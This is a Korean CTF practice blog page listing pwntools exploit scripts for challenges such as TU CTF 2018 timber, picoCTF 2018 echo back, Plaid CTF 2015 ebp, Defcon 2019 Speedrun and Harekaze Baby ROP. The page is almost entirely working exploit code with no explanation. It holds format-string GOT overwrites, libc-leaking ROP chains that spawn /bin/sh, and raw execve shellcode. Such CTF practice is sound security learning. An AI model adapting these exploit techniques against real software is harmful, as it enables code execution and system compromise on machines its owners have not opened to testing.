TU CTF 2018 timber

System/Pwnable Practice 2019. 8. 12. 22:01

exploit.py


from pwn import *
  
p = process("./timber")

e = ELF("./timber")

print p.recvuntil("name: ")
date_low = 0x867b
date_high = 0x10804
printf_got = e.got["printf"]

payload = p32(printf_got)
payload += p32(printf_got+2)
payload += "%5${0}x".format(date_low-8)
payload += "%2$n"
payload += "%6${0}x".format(date_high-date_low)
payload += "%3$n"


p.sendline(payload)
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

pico CTF 2018 echo back  (0) 2019.08.12
picoCTF 2018 authenticate  (0) 2019.08.10
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

pico CTF 2018 echo back

System/Pwnable Practice 2019. 8. 12. 20:58

exploit.py


from pwn import *

p = process('./echoback')
e = ELF('./echoback')

vuln_low = 0x85ab
vuln_high = 0x10804
system_got_low = 0x8460
system_got_high = 0x10804
puts_got = e.got['puts']
printf_got = e.got['printf']

payload = p32(puts_got)
payload += p32(puts_got + 2)
payload += '%{}x'.format(vuln_low - 8)
payload += "%7$hn"
payload += '%{}x'.format(vuln_high - vuln_low)
payload += "%8$hn"
p.sendlineafter('\n', payload)

payload2 = p32(printf_got)
payload2 += p32(printf_got+2)
payload2 += "%{}x".format(system_got_low-8)
payload2 += "%7$hn"
payload2 += '%{}x'.format(system_got_high - system_got_low)
payload2 += "%8$hn"

p.sendlineafter("message:\n",payload2)
p.sendlineafter("message:\n","/bin/sh\x00")
p.interactive()

'System > Pwnable Practice' 카테고리의 다른 글

TU CTF 2018 timber  (0) 2019.08.12
picoCTF 2018 authenticate  (0) 2019.08.10
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

picoCTF 2018 authenticate

System/Pwnable Practice 2019. 8. 10. 00:05

exploit.py

 

from pwn import *
 
p = process("./auth")

auth_variable = 0x0804A04C

payload = p32(auth_variable)
payload += "%11$n"

p.sendlineafter("\n",payload)

print p.recv()

 

'System > Pwnable Practice' 카테고리의 다른 글

TU CTF 2018 timber  (0) 2019.08.12
pico CTF 2018 echo back  (0) 2019.08.12
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

TUCTF CTF 2018 Ehh

System/Pwnable Practice 2019. 8. 9. 23:30

exploit.py

 

from pwn import *
 
p = process("./ehh")

p.recvuntil("here< ")
protect_addr = int(p.recv(10),16)

payload = p32(protect_addr)
payload += "%20x"
payload += "%6$n"

p.recv()
sleep(0.1)
p.sendline(payload)
sleep(0.1)
print p.recv()

'System > Pwnable Practice' 카테고리의 다른 글

pico CTF 2018 echo back  (0) 2019.08.12
picoCTF 2018 authenticate  (0) 2019.08.10
Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Pico CTF 2018 echooo  (0) 2019.08.04
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Plaid CTF 2015 ebp

System/Pwnable Practice 2019. 8. 6. 21:39

exploit.py


from pwn import *

p = process("./ebp")
e = ELF('./ebp')

payload = "%{0}p%4$n".format(e.got['fgets'])

p.sendline(payload)
p.recv(2048)

bufAddr = 0x0804A080
payload2 = "%{0}p%12$n".format(bufAddr+30)
payload2 += "\x90"*100
payload2 += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

p.sendline(payload2)
p.recv(2048)

p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

picoCTF 2018 authenticate  (0) 2019.08.10
TUCTF CTF 2018 Ehh  (0) 2019.08.09
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Pico CTF 2018 echooo  (0) 2019.08.04
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Layer7 CTF 2018 Life Game

System/Pwnable Practice 2019. 8. 5. 02:27

exploit.py


from pwn import *
  
for i in range(0,100):
	try:
		p = process("./life_game")
		p.sendlineafter("6. escape\n-----------------------\n","5")
		p.sendlineafter("5. go back\n-----------------------\n","3")
		p.sendlineafter("How much?\n","-10000000")
		p.sendlineafter("5. go back\n-----------------------\n","5")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","2")
		p.sendlineafter("6. escape\n-----------------------\n","4")
		p.sendlineafter("6. escape\n-----------------------\n","5")
		p.sendlineafter("5. go back\n-----------------------\n","3")
		p.sendlineafter("How much?\n","1000000")
		p.sendlineafter("5. go back\n-----------------------\n","5")
		p.sendlineafter("6. escape\n-----------------------\n","31337")
		p.sendlineafter("The last one\n","%"+str(i)+"$s")
		print p.recv()
		p.close()
	except:
		"fail"
		p.close()


'System > Pwnable Practice' 카테고리의 다른 글

TUCTF CTF 2018 Ehh  (0) 2019.08.09
Plaid CTF 2015 ebp  (0) 2019.08.06
Pico CTF 2018 echooo  (0) 2019.08.04
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Pico CTF 2018 echooo

System/Pwnable Practice 2019. 8. 4. 23:34

exploit.py


from pwn import *
  
p = process("./echo")

for i in range(1,100):
    try:
        p = process("./echo")
        payload ="%"+str(i)+"$s"
        p.sendlineafter("> ",payload)
        result = p.recv(2048)
        if "picoCTF" in result:
            print result
            break
        p.close()
    except:
        print "fail"
        p.close()


'System > Pwnable Practice' 카테고리의 다른 글

Plaid CTF 2015 ebp  (0) 2019.08.06
Layer7 CTF 2018 Life Game  (0) 2019.08.05
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
Harekaze CTF 2019 Baby ROP 1,2  (0) 2019.08.01
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Layer7 CTF 2018 Talmoru_party!~

System/Pwnable Practice 2019. 8. 2. 23:46

exploit.py


from pwn import *

p = process("./vuln")
         
e = ELF("./vuln")
l = e.libc
        
p.sendlineafter(">>","3")
             
pr = 0x0804884b
restart = 0x80486E0

payload = "A"*(0x40+4)
payload += p32(e.plt['puts'])  
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(restart)
    
p.sendlineafter("plz!\n",payload)
p.recvuntil("Good bye~~!\n")
puts_addr = u32(p.recv(4))
libc_base = puts_addr - l.symbols['puts']
one_gadget = [0x3d0d5,0x3d0d5,0x3d0d9,0x3d0e0,0x67a7f,0x67a80,0x137e5e,0x137e5f]
one_addr = libc_base + one_gadget[0]

payload2 = "A"*(0x40+4)
payload2 += p32(one_addr)
p.sendlineafter("plz",payload2)
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

Layer7 CTF 2018 Life Game  (0) 2019.08.05
Pico CTF 2018 echooo  (0) 2019.08.04
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
Harekaze CTF 2019 Baby ROP 1,2  (0) 2019.08.01
Hitcon CTF 2017 start  (0) 2019.07.30
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Defcon CTF 2019 Speedrun 1,2

System/Pwnable Practice 2019. 8. 1. 21:45

speedrun1_exploit.py


from pwn import *

p = process("./vuln")
e = ELF('./vuln')

syscall = 0x474e65
pop_eax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x4498b5
binsh = "/bin/sh\x00"
         
payload = "A"*0x400 
payload += "B"*8
payload += p64(pop_eax) 
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(e.bss())
payload += p64(pop_rdx)
payload += p64(len(binsh))
payload += p64(syscall)



payload += p64(pop_eax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(e.bss())
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)

p.sendlineafter("words?\n",payload)
sleep(0.1)
p.send(binsh)
p.interactive()



speedrun2_exploit.py


from pwn import *

p = process("./vuln")

e = ELF('./vuln')
l = e.libc

p.sendlineafter("now?\n","Everything intelligent is so boring.")

pr = 0x4008a3
         
payload = "A"*(0x400+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(0x40074C)
      
p.sendlineafter("more.\n",payload)
print p.recvuntil("Fascinating.\n")
puts_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + 0x10a38c

p.sendlineafter("now?\n","Everything intelligent is so boring.")

payload2 = "A"*(0x400+8)
payload2 += p64(one_addr)

print p.sendlineafter("more.\n",payload2)
sleep(0.1)
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

Pico CTF 2018 echooo  (0) 2019.08.04
Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Harekaze CTF 2019 Baby ROP 1,2  (0) 2019.08.01
Hitcon CTF 2017 start  (0) 2019.07.30
Codegate 2019 CTF aeiou  (0) 2019.07.30
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Harekaze CTF 2019 Baby ROP 1,2

System/Pwnable Practice 2019. 8. 1. 20:04

bayrop1_exploit.py


from pwn import *
  
p = process("./babyrop1")

system = 0x400490
binsh = 0x601048
pr = 0x400683
ret = 0x400479

payload = "A"*(0x10+8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(ret)
payload += p64(system)

p.sendlineafter("? ",payload)
p.interactive()



babyrop2_exploit.py


from pwn import *

p = process("./babyrop2")

e = ELF("./babyrop2")
l = e.libc

pr = 0x400733
ret = 0x4004d1
one_gadget = [0x4f2c5,0x4f322,0x10a38c]

payload = "A"*(0x20+8)
payload += p64(pr)
payload += p64(e.got["read"])
payload += p64(ret)
payload += p64(e.plt['printf'])
payload += p64(ret)
payload += p64(0x400636)

p.sendlineafter("? ",payload)
p.recvuntil("!\n")
read_addr =  u64(p.recv(6).ljust(8,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']
binsh = libc_base + list(l.search("/bin/sh"))[0]

payload2 = "A"*(0x20+8)
payload2 += p64(ret)
payload2 += p64(pr)
payload2 += p64(binsh)
payload2 += p64(system_addr)
p.recvuntil("? ")
p.sendline(payload2)
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

Layer7 CTF 2018 Talmoru_party!~  (0) 2019.08.02
Defcon CTF 2019 Speedrun 1,2  (0) 2019.08.01
Hitcon CTF 2017 start  (0) 2019.07.30
Codegate 2019 CTF aeiou  (0) 2019.07.30
Codegate 2016 CTF Watermelon  (0) 2019.07.29
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

공지사항

글 보관함

달력

«   2025/01   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

티스토리툴바